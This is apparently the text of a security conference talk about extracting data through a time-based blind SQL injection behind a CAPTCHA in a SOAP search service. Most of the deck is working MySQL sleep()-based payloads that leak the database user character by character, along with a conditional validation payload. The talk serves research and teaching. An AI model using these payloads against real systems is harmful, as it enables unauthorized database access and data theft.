Time based CAPTCHA protected SQL injection through SOAP-webservice
detectify
Time based captcha protected SQL injection through SOAP-webservice
Frans Rosén @fransrosen
Search + CAPTCHA
Search for Bobby: '
Search: '-sleep(5)-'
CAPTCHA…
https://twitter.com/offensive_image/status/751191306500734976
Me need
1. Do a clear PoC – get data
2. As few requests as possible
3. Find ALL the storefronts!
4. ???
5. PROFIT!!!
user()
'-sleep((ascii(substring(user(),1,1))-90)/2)-'
(14*2)+90 = 118 == v
Validate
'-(if(ascii(substring(user(),1,1))=117,sleep(3),1))-(if(ascii(substring(user(),1,1))=118,sleep(6),1))-(if(ascii(substring(user(),1,1))=119,sleep(9),1))-'
===v
Down on the @
'-sleep((ascii(substring(user(),21,1))-90)/2)-'
Host search
'-sleep((ascii(substring(user(),21,1))-46)*2)-'
0s for a dot
(T-4)/2 = 2
Setup
Result
Other
https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
SQL Injection Optimization and Obfuscation Techniques
Thanks!
Frans Rosén (@fransrosen) – www.detectify.com